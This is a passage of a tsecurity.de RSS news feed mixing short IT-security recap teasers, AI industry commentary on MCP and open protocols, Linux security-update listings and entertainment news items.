<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>I reckon this week's video on how Claude is tying together info from UniFi, Home Assistant and the Pi-Hole is an absolute ripper. Or at least the concept is - if ever there was an actual value proposition for AI it's taking lots of noise and</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[/r/ReverseEngineering's Weekly Questions Thread]]></title>
<description><![CDATA[To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have ...]]></description>
<link>https://tsecurity.de/de/3682544/reverse-engineering/rreverseengineerings-weekly-questions-thread/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682544/reverse-engineering/rreverseengineerings-weekly-questions-thread/</guid>
<pubDate>Tue, 21 Jul 2026 04:24:43 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the <a href="http://reverseengineering.stackexchange.com/">Reverse Engineering StackExchange</a>. See also <a href="https://www.reddit.com/r/AskReverseEngineering">/r/AskReverseEngineering</a>.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/AutoModerator"> /u/AutoModerator </a> <br> <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1v1e2pg/rreverseengineerings_weekly_questions_thread/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ReverseEngineering/comments/1v1e2pg/rreverseengineerings_weekly_questions_thread/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sicherheits-Recap: WordPress-, SonicWall- und SharePoint-0-Days sowie KI-Service-Angriffe]]></title>
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) – Innerhalb weniger Tage häufen sich Server- und Endpunkt-Exploits: WordPress-Core-Codeausführung, SonicWall-SMA-Zero-Days und ein SharePoint-RCE wurden teils schon vor Patch-Verfügbarkeit in freier Wildbahn missbraucht. Dazu kommen ein OpenSSL-DoS mit nur 11 Bytes, ...]]></description>
<link>https://tsecurity.de/de/3682438/it-security-nachrichten/sicherheits-recap-wordpress-sonicwall-und-sharepoint-0-days-sowie-ki-service-angriffe/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682438/it-security-nachrichten/sicherheits-recap-wordpress-sonicwall-und-sharepoint-0-days-sowie-ki-service-angriffe/</guid>
<pubDate>Tue, 21 Jul 2026 02:37:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" fetchpriority="high" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/07/ai-weekly-recap-zero-days-wordpress-sonicwall-sharepoint-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BERLIN / LONDON (IT BOLTWISE) – Innerhalb weniger Tage häufen sich Server- und Endpunkt-Exploits: WordPress-Core-Codeausführung, SonicWall-SMA-Zero-Days und ein SharePoint-RCE wurden teils schon vor Patch-Verfügbarkeit in freier Wildbahn missbraucht. Dazu kommen ein OpenSSL-DoS mit nur 11 Bytes, neue Malware-Frameworks zur Abgreifung von Krypto-Seed-Phrasen und eine Botnet-Jagd auf öffentlich erreichbare KI-Services. Der Recap zeigt nicht nur, was […]</p>
<div><a href="https://www.it-boltwise.de/sicherheits-recap-wordpress-sonicwall-und-sharepoint-0-days-sowie-ki-service-angriffe.html">... den vollständigen Artikel <strong>»Sicherheits-Recap: WordPress-, SonicWall- und SharePoint-0-Days sowie KI-Service-Angriffe«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/sicherheits-recap-wordpress-sonicwall-und-sharepoint-0-days-sowie-ki-service-angriffe.html">Sicherheits-Recap: WordPress-, SonicWall- und SharePoint-0-Days sowie KI-Service-Angriffe</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[More AI Bugs, Less Security?]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:6 AI is exceptionally good at identifying code patterns that lead to crashes and other common programming mistakes. That capability can dramatically increase the number of reported bugs.

Finding more bugs doesn't necessarily reduce...]]></description>
<link>https://tsecurity.de/de/3682032/it-security-video/more-ai-bugs-less-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3682032/it-security-video/more-ai-bugs-less-security/</guid>
<pubDate>Mon, 20 Jul 2026 21:18:10 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:6 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/FYxSIYsD_DY?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI is exceptionally good at identifying code patterns that lead to crashes and other common programming mistakes. That capability can dramatically increase the number of reported bugs.<br />
<br />
Finding more bugs doesn't necessarily reduce real-world cyber risk. If the proportion of high-impact, exploitable vulnerabilities stays the same, security teams may spend increasing amounts of time triaging and fixing low-value findings simply because they now exist in the backlog. More detection can create more work without delivering proportional security gains.<br />
<br />
Should AI-powered security tools be judged by how many bugs they find—or by how many meaningful attacks they actually help prevent?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#AppSec #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[China’s AI models have Trump’s AI world at war with itself]]></title>
<description><![CDATA[This story originally appeared in The Algorithm, our weekly newsletter on AI. To get stories like this in your inbox first, sign up here. Over the weekend, several current and former advisors to President Donald Trump on AI publicly lobbed insults at the country’s leading AI companies. David Sack...]]></description>
<link>https://tsecurity.de/de/3681957/ai-nachrichten/chinas-ai-models-have-trumps-ai-world-at-war-with-itself/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681957/ai-nachrichten/chinas-ai-models-have-trumps-ai-world-at-war-with-itself/</guid>
<pubDate>Mon, 20 Jul 2026 20:34:34 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This story originally appeared in The Algorithm, our weekly newsletter on AI. To get stories like this in your inbox first, sign up here. Over the weekend, several current and former advisors to President Donald Trump on AI publicly lobbed insults at the country’s leading AI companies. David Sacks, the president’s AI and crypto “czar” until…]]></content:encoded>
</item>
<item>
<title><![CDATA[Where the real competition is in AI]]></title>
<description><![CDATA[Last year Anthropic gave away one of the most successful things it has ever built. And, no, I’m not talking about Claude. I’m referring to MCP, the now ubiquitous Model Context Protocol, which Anthropic donated to the Linux Foundation’s new Agentic AI Foundation⁠. At the time, MCP was pulling nea...]]></description>
<link>https://tsecurity.de/de/3681885/ai-nachrichten/where-the-real-competition-is-in-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681885/ai-nachrichten/where-the-real-competition-is-in-ai/</guid>
<pubDate>Mon, 20 Jul 2026 19:48:37 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Last year Anthropic gave away one of the most successful things it has ever built. And, no, I’m not talking about Claude. I’m referring to MCP, the now ubiquitous <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a>, which Anthropic <a href="https://anthropic.com/news/donating-the-model-context-protocol-and-establishing-of-the-agentic-ai-foundation">donated to the Linux Foundation’s new Agentic AI Foundation</a>⁠. At the time, MCP was <a href="https://blog.modelcontextprotocol.io/posts/2025-12-09-mcp-joins-agentic-ai-foundation/">pulling nearly 100 million monthly SDK downloads</a> across more than 10,000 active servers⁠, prompting the question as to why any company would give up such a popular piece of technology.</p>



<p class="wp-block-paragraph">Google did much the same months earlier, <a href="https://developers.googleblog.com/en/google-cloud-donates-a2a-to-linux-foundation/">handing its Agent2Agent (A2A) protocol</a> to the Linux Foundation⁠ with AWS, Cisco, Microsoft, Salesforce, SAP, and ServiceNow signing on as founding members. OpenAI, not to be outdone, <a href="https://openai.com/index/new-tools-and-features-in-the-responses-api/">supports remote MCP servers in its Responses API</a>⁠, sits on the MCP steering committee, and contributed AGENTS.md to that same foundation alongside its fiercest rival’s protocol.</p>



<p class="wp-block-paragraph">It’s like <em>Game of Thrones</em>, except the principal AI powers seek regime change through seeming acts of beneficence rather than violence. For those who have been around for a while, it’s also entirely predictable, following a similar script we’ve seen in the cloud, on-premises servers, and more. Platform companies don’t give away technologies they’ve stopped caring about. They give away technologies they no longer need to own because competitive advantage has shifted to new ground.</p>



<p class="wp-block-paragraph">What does this mean for AI?</p>



<h2 class="wp-block-heading"><a></a>Gravity has shifted before</h2>



<p class="wp-block-paragraph">Google has long been an exceptionally active contributor to <a href="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2262355/what-is-open-source-software-open-source-and-foss-explained.html">open source</a>. <a href="https://www.infoworld.com/article/2260293/open-source-innovation-is-now-all-about-vendor-on-ramps-2.html">As I wrote in 2017</a>, Google wasn’t open sourcing TensorFlow and Kubernetes out of generosity but rather turning these open source assets into on-ramps for Google Cloud. Google was playing catch-up to AWS and Microsoft. As <a href="https://www.infoworld.com/article/2248699/why-kubernetes-is-winning-the-container-war.html">then Google product manager Martin Buhr said</a>, the company hoped to “create a gravity well in the market for container-based apps [so] that a significant percentage of them will end up with us.”</p>



<p class="wp-block-paragraph">In other words, platform companies routinely commoditize one layer of the stack so they can compete somewhere where they hold a stronger hand.</p>



<p class="wp-block-paragraph"><a href="https://www.infoworld.com/article/2266566/what-is-github-more-than-git-version-control-in-the-cloud.html" data-type="link" data-id="https://www.infoworld.com/article/2266566/what-is-github-more-than-git-version-control-in-the-cloud.html">GitHub</a> may be an even better example. <a href="https://www.infoworld.com/article/2334697/what-is-git-version-control-for-collaborative-programming.html">Git </a>is open. Anyone can host a Git repository and, once upon a time, different companies did just that. Yet <a href="https://www.infoworld.com/article/2266566/what-is-github-more-than-git-version-control-in-the-cloud.html">GitHub </a>became the default place software development happens for millions of developers. Nobody pays for Git, but lots of people pay for GitHub. We’re seeing this same phenomenon play out in AI.</p>



<h2 class="wp-block-heading">Trading contributions for control</h2>



<p class="wp-block-paragraph">Anthropic and OpenAI have both pretended at being all for humanity’s good, but that’s not a good explanation for why they’re racing to give away things like <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP</a>. The deeper reason is that the model itself has turned out to be a poor place to build a lasting moat, and they’re trying to figure out what’s next. <a href="https://www.infoworld.com/article/4195842/which-ai-model-should-you-bet-your-company-on-none-of-them.html">As I pointed out recently</a>, the frontier model leaderboards change almost weekly. As such, enterprises shouldn’t build their AI strategy around the assumption that any one vendor will remain permanently ahead on model quality. Instead, as I suggested, AI may be sexy, but the “dull reality” is connecting those models to enterprise data, workflows, etc.</p>



<p class="wp-block-paragraph">The AI companies understand this better than anyone. Sure, they’ll continue spending billions training ever more capable models because frontier models attract developers, generate headlines, and open enterprise doors. But they’re also quietly acknowledging that benchmark leadership alone doesn’t create a durable platform.</p>



<p class="wp-block-paragraph">Developers return to the places where their tools, workflows, teammates, and accumulated work already live. Enterprises double down on the systems where their data, permissions, governance, and business processes are already connected. Every new integration makes that destination a little harder to leave, and every new workflow increases its pull. That’s what MCP, A2A, etc., are all about: increasing gravity around the models.</p>



<p class="wp-block-paragraph">Every major AI company wants to become the place where AI-assisted work naturally happens, and they’re now amassing armies of forward deployed engineers and trying other means to get legacy infrastructure to tie back to their frontier models. The enterprise incumbents want the same thing, but from the opposite direction. They don’t need to own the frontier; instead they need to connect the frontier to the systems that already safely run the business.</p>



<p class="wp-block-paragraph">That’s why I’m skeptical whenever someone confidently predicts that AI will sweep away enterprise software. I’ve seen this movie before. Developers absolutely live on the frontier, but enterprises don’t. Enterprises create value by connecting new capabilities to decades of accumulated applications, data, policies, and business processes. The newest model matters, and so does the newest agent framework. But neither creates much business value until it’s connected to customer records, financial systems, supply chains, HR data, and everything else enterprises already depend on.</p>



<p class="wp-block-paragraph">That’s where incumbents still possess enormous gravitational pull. My employer, Oracle, certainly believes so, just as Microsoft, SAP, Salesforce, and ServiceNow do. (Disclosure: I run developer relations at Oracle, which participates in the Agentic AI Foundation.) Ironically, open protocols strengthen that position rather than weaken it. If every model can speak MCP and every agent can interoperate through common standards, enterprises gain the freedom to adopt whichever frontier technology looks best without rebuilding every integration. The protocol becomes interchangeable.</p>



<h2 class="wp-block-heading">Open standards don’t stop gravity</h2>



<p class="wp-block-paragraph">None of this diminishes the importance of open standards. MCP succeeded because it solves a genuine problem. Developers shouldn’t have to build a custom connector every time an AI application needs access to a database or other business system. Neutral governance also matters because nobody wants foundational infrastructure controlled by a direct competitor. But we shouldn’t confuse open interfaces with open markets.</p>



<p class="wp-block-paragraph">An enterprise may find it easy to swap one MCP-compatible model for another while still remaining deeply dependent on the place where its prompts, evaluations, security policies, and employee habits have accumulated. Again, we’ve seen this before. Kubernetes made workloads dramatically more portable without making AWS, Microsoft Azure, and Google Cloud interchangeable. SQL has been standardized for decades, yet databases remain fiercely differentiated businesses. Standards reduce friction, but they rarely eliminate competitive advantage. They simply move it.</p>



<p class="wp-block-paragraph">In like manner, Anthropic, Google, OpenAI, and others are happily standardizing how models, agents, tools, and enterprise systems communicate because they don’t expect the connection itself to determine the winner. Instead they expect to win by becoming the place where AI-assisted work naturally accumulates. Along the way, we’re going to see copious quantities of code given away, increasing developer productivity for all and outsized financial bonanzas for a few. Game on.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV Confirms Release Date for New Movie From CODA Oscar Winner]]></title>
<description><![CDATA[Apple has revealed release dates for Being Heumann, the next film from CODA writer and director Siân Heder. The biographical drama will arrive in select theaters on November 6, 2026, followed by its Apple TV streaming release on November 13.



Being Heumann tells Judy Heumann’s story



Based on...]]></description>
<link>https://tsecurity.de/de/3681772/ios-mac-os/apple-tv-confirms-release-date-for-new-movie-from-coda-oscar-winner/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681772/ios-mac-os/apple-tv-confirms-release-date-for-new-movie-from-coda-oscar-winner/</guid>
<pubDate>Mon, 20 Jul 2026 19:04:44 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has revealed release dates for Being Heumann, the next film from CODA writer and director Siân Heder. The biographical drama will arrive in select theaters on November 6, 2026, followed by its Apple TV streaming release on November 13.



Being Heumann tells Judy Heumann’s story



Based on Judy Heumann’s memoir, Being Heumann: An Unrepentant Memoir of a Disability Rights Activist, the film follows her fight for equal rights and accessibility in the United States.



The story focuses on the historic 1977 Section 504 sit-in, when Heumann and more than 100 disability rights protesters occupied a federal building. Their protest pushed the government to enforce protections against disability discrimination.



Ruth Madeley plays Heumann, while Mark Ruffalo appears as US government official Joseph Califano Jr. The supporting cast includes Dylan O’Brien, Rob Delaney, Ray Fisher, Daniel Durant, Jon Beavers and Roberta Colindrez.



CODA director returns to Apple TV



Heder previously wrote and directed CODA on Apple TV, which won Best Picture, Best Supporting Actor and Best Adapted Screenplay at the 2022 Academy Awards. Its Best Picture victory made Apple the first streaming service to win the Oscars’ highest film award.



According to Entertainment Weekly’s first look, Heder wanted to show the activists as complex people with humour, relationships and different personalities, rather than presenting the movement through a conventional biographical format.



Before its theatrical and streaming releases, Being Heumann will open the 2026 Toronto International Film Festival on September 10. The festival runs through September 20.



With its awards-season release plan, major cast and socially important story, Being Heumann is likely to become one of Apple TV’s most closely watched original films of 2026.]]></content:encoded>
</item>
<item>
<title><![CDATA[‘House of the Dragon’ Season 3, Episode 5 Recap: Alicent and Helaena Face a Dark Fate]]></title>
<description><![CDATA[House of the Dragon Season 3, Episode 5 slows the pace after the conflict at Tumbleton, focusing on the personal and political consequences spreading across Westeros. Titled “Unbowed and Unbent,” the episode follows several characters who have lost control of their lives, armies, and claims to po...]]></description>
<link>https://tsecurity.de/de/3681763/ios-mac-os/house-of-the-dragon-season-3-episode-5-recap-alicent-and-helaena-face-a-dark-fate/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681763/ios-mac-os/house-of-the-dragon-season-3-episode-5-recap-alicent-and-helaena-face-a-dark-fate/</guid>
<pubDate>Mon, 20 Jul 2026 19:04:30 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[House of the Dragon Season 3, Episode 5 slows the pace after the conflict at Tumbleton, focusing on the personal and political consequences spreading across Westeros. Titled “Unbowed and Unbent,” the episode follows several characters who have lost control of their lives, armies, and claims to power.



Spoiler warning: This recap contains major spoilers for House of the Dragon Season 3, Episode 5.




Episode title: Unbowed and Unbent



Release date: July 19, 2026



Streaming platform: HBO Max



Genre: Fantasy drama




The episode arrived on HBO and HBO Max in the United States on Sunday, July 19, while viewers in several international regions received it on Monday, July 20. New episodes continue to release weekly.



Alicent and Helaena Try to Escape the Red Keep



The most disturbing storyline follows Alicent and a pregnant Helaena, who remain prisoners inside the Red Keep after Rhaenyra’s forces captured King’s Landing.



Alicent discovers a hidden passage connected to Rhaenyra’s old bedroom and decides that it could offer them a way out. However, Helaena initially refuses to enter the tunnels because they remind her of the men who murdered her son, Jaehaerys.



She eventually follows Alicent, but their escape soon goes wrong. The narrow passage leads them deeper into the castle's hidden structure, where they become trapped without light or a clear route back.



Their situation reflects how far both women have fallen. Alicent once influenced kings and controlled the royal court, while Helaena carried the title of queen. They now find themselves buried inside the walls of the same political system that once protected them.



Daemon knows many of the Red Keep’s hidden routes, which leaves open the possibility that he could find them in Episode 6. However, their disappearance could create another serious problem for Rhaenyra’s unstable rule.



Aemond Finds Comfort With Alys Rivers







At Harrenhal, Aemond continues recovering from his injuries while struggling with nightmares and guilt. He dreams about Aegon and fears that Helaena’s warning about his death will come true.



Alys Rivers cares for him during his weakest moments. Their relationship develops with surprising tenderness as Alys helps him face his fear of losing Vhagar and his position in the war. Aemond also protects her when danger arrives, revealing a softer side rarely seen in previous seasons.



Criston Cole Prepares for His Final Battle



Criston Cole’s forces face growing resistance in the Riverlands as Oscar Tully counters his guerrilla attacks. With morale collapsing and the road to Tumbleton closing, Cole accepts that he may not survive the coming confrontation.



His speech to his remaining soldiers strongly prepares the story for the Butcher’s Ball, one of the Dance of the Dragons’ most brutal events. In the book, Cole dies after attempting to negotiate, but the series appears ready to give the confrontation a more personal focus.



Who Killed Rhaenyra’s Gold Cloaks?



The episode ends with Daemon discovering several murdered members of the City Watch, including men loyal to Rhaenyra. Their bodies have been arranged beneath a message written in blood: “A feast for traitors.”



Ormund Hightower arranged the attack as part of a larger campaign to weaken Rhaenyra’s control over King’s Landing. By targeting her enforcers and spreading anti-crown propaganda, he hopes to turn the smallfolk against her from within.



House of the Dragon Season 3, Episode 5 replaces dragon battles with fear, isolation, and political sabotage. Alicent and Helaena remain trapped, Criston prepares for a final stand, and Rhaenyra faces a growing rebellion inside her new capital.



What do you think will happen to Alicent and Helaena, and will Daemon find them before it is too late? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[⚡ Weekly Recap: WordPress RCE, SonicWall 0-Days, AI Service Attacks, SharePoint 0-Day and More]]></title>
<description><![CDATA[A single request should not be able to do this much. But this week, small inputs led to code execution, memory loss, stolen keys, and disabled security tools.

The paths were often simple: exposed systems, weak checks, old drivers, fake prompts, and public code used for malware delivery. Some bug...]]></description>
<link>https://tsecurity.de/de/3681388/it-security-nachrichten/weekly-recap-wordpress-rce-sonicwall-0-days-ai-service-attacks-sharepoint-0-day-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681388/it-security-nachrichten/weekly-recap-wordpress-rce-sonicwall-0-days-ai-service-attacks-sharepoint-0-day-and-more/</guid>
<pubDate>Mon, 20 Jul 2026 16:24:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A single request should not be able to do this much. But this week, small inputs led to code execution, memory loss, stolen keys, and disabled security tools.

The paths were often simple: exposed systems, weak checks, old drivers, fake prompts, and public code used for malware delivery. Some bugs were new. Others were already being used before defenders had time to patch.

Here is the full]]></content:encoded>
</item>
<item>
<title><![CDATA[⚡ Weekly Recap: WordPress RCE, SonicWall 0-Days, AI Service Attacks, SharePoint 0-Day and More]]></title>
<description><![CDATA[A single request should not be able to do this much. But this week, small inputs led to code execution, memory loss, stolen keys, and disabled security tools. The paths were often simple: exposed systems, weak checks, old drivers, fake…
Read more →
The post ⚡ Weekly Recap: WordPress RCE, SonicWal...]]></description>
<link>https://tsecurity.de/de/3681379/it-security-nachrichten/weekly-recap-wordpress-rce-sonicwall-0-days-ai-service-attacks-sharepoint-0-day-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681379/it-security-nachrichten/weekly-recap-wordpress-rce-sonicwall-0-days-ai-service-attacks-sharepoint-0-day-and-more/</guid>
<pubDate>Mon, 20 Jul 2026 16:24:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A single request should not be able to do this much. But this week, small inputs led to code execution, memory loss, stolen keys, and disabled security tools. The paths were often simple: exposed systems, weak checks, old drivers, fake…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/%E2%9A%A1-weekly-recap-wordpress-rce-sonicwall-0-days-ai-service-attacks-sharepoint-0-day-and-more/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/%E2%9A%A1-weekly-recap-wordpress-rce-sonicwall-0-days-ai-service-attacks-sharepoint-0-day-and-more/">⚡ Weekly Recap: WordPress RCE, SonicWall 0-Days, AI Service Attacks, SharePoint 0-Day and More</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Banning AI Won't Stop It]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 Highly regulated industries have often been slower to adopt AI because regulations and risk concerns create uncertainty. But organizations are increasingly realizing they can't delay forever.

Cybersecurity and risk teams are shif...]]></description>
<link>https://tsecurity.de/de/3681336/it-security-video/banning-ai-wont-stop-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681336/it-security-video/banning-ai-wont-stop-it/</guid>
<pubDate>Mon, 20 Jul 2026 16:02:43 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/vs876-CDAY0?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Highly regulated industries have often been slower to adopt AI because regulations and risk concerns create uncertainty. But organizations are increasingly realizing they can't delay forever.<br />
<br />
Cybersecurity and risk teams are shifting from acting solely as gatekeepers to becoming enablers. If they don't provide secure, approved paths for AI adoption, employees may turn to unauthorized tools instead, creating "shadow AI" that is harder to monitor and govern. The challenge is balancing innovation with responsible oversight rather than choosing one over the other.<br />
<br />
Would stricter AI restrictions improve security in your organization—or encourage more employees to find workarounds?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#AIGovernance #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by Debian (kernel, libnfs, roundcube, and tiff), Fedora (antlr4-project, chromium, erlang, libseccomp, libtiff, log4cxx, mbedtls, node-exporter, opam, openssh, proftpd, python-asyncssh, python-django5, python-libcst, python-orjson, python-uv-build, ruby, rust-ast...]]></description>
<link>https://tsecurity.de/de/3681213/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3681213/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 20 Jul 2026 15:10:28 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>Debian</b> (kernel, libnfs, roundcube, and tiff), <b>Fedora</b> (antlr4-project, chromium, erlang, libseccomp, libtiff, log4cxx, mbedtls, node-exporter, opam, openssh, proftpd, python-asyncssh, python-django5, python-libcst, python-orjson, python-uv-build, ruby, rust-astral_async_zip, spoofdpi, uv, and yq), <b>Mageia</b> (bind, clamav, erlang, libidn, libreoffice, nmap, nodejs, perl-Bytes-Random-Secure, perl-Config-IniFiles, perl-CSS-Minifier-XS, perl-HTML-Parser, perl-Mojolicious, perl-String-Util, python-pydantic-settings, rsync, and upower), <b>Oracle</b> (.NET 10.0, .NET 8.0, .NET 9.0, bind, cockpit, cockpit-image-builder, coreutils, delve, dnsmasq, dovecot, expat, fence-agents, flatpak, frr, gdk-pixbuf2, giflib, glib2, go-fdo-client and go-fdo-server, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, httpd, jq, kernel, keylime, krb5, libcap, libexif, libpng, libsndfile, libsolv, libsoup3, libtasn1, libtiff, libxslt, libyang, mariadb10.11, mod_http2, mod_md, opencryptoki, PackageKit, perl-Archive-Tar, perl-IO-Compress, poppler, postfix, postgresql-jdbc, python-urllib3, python3.14, python3.14-pip, python3.14-urllib3, qt6-qtdeclarative, rrdtool, rsync, ruby, ruby4.0, samba, skopeo, thunderbird, valkey, wireshark, xorg-x11-server-Xwayland, and yggdrasil-worker-package-manager), and <b>SUSE</b> (blender, chromium, containerized-data-importer1, cyrus-imapd, go1.26-openssl, gomuks, grafana, gstreamer-plugins-bad, kbfs, kubevirt1.8-container-disk, libxml2, lux, mariadb-connector-c, nginx, opam, openssl-3, oras, perl-DBI, php-composer2, python-django-haystack, python-paramiko, python-weasyprint, python311, python313-Pillow, python315, shibboleth-sp, system-user-zabbix, and wget).]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Security at Scale, CMMC phase II paused, and the Weekly Enterprise News - Keith Hollender - ESW #468]]></title>
<description><![CDATA[Interview with Keith Hollender, CEO and Co-Founder of Arcova Why AI Security Is Becoming an Execution Problem, Not Just a Governance Problem As enterprises move from AI experimentation to adoption at scale, security leaders are under pressure to enable innovation without introducing unmanaged ris...]]></description>
<link>https://tsecurity.de/de/3680728/it-security-nachrichten/ai-security-at-scale-cmmc-phase-ii-paused-and-the-weekly-enterprise-news-keith-hollender-esw-468/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680728/it-security-nachrichten/ai-security-at-scale-cmmc-phase-ii-paused-and-the-weekly-enterprise-news-keith-hollender-esw-468/</guid>
<pubDate>Mon, 20 Jul 2026 11:37:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Interview with Keith Hollender, CEO and Co-Founder of Arcova</h3> <p><strong>Why AI Security Is Becoming an Execution Problem, Not Just a Governance Problem</strong></p> <p>As enterprises move from AI experimentation to adoption at scale, security leaders are under pressure to enable innovation without introducing unmanaged risk. The challenge is no longer whether organizations should pursue AI, but how they can govern it, secure it, and operationalize it in ways that stand up to real-world business and threat conditions.</p> <p>In this conversation, Keith Hollender discusses what Arcova is seeing across enterprise environments as organizations work to connect cybersecurity, AI governance, resilience, and broader transformation priorities. He explores where companies are getting stuck, why traditional siloed approaches are falling short, and what it takes to move from strategy decks to secure execution.</p> <p>Keith also shares how Arcova's practitioner-led, relationship-driven model helps organizations turn complexity into clarity by embedding with client teams, solving urgent problems hands-on, and building capabilities designed to last. The conversation also covers Arcova's continued growth, including expansion into the Middle East, and what global demand signals reveal about the next phase of cybersecurity and AI consulting.</p> <p><strong>Segment Resources:</strong></p> <ul> <li><a rel="noopener" target="_blank" href="https://arcova.com/sectors/">https://arcova.com/sectors/</a></li> <li><a rel="noopener" target="_blank" 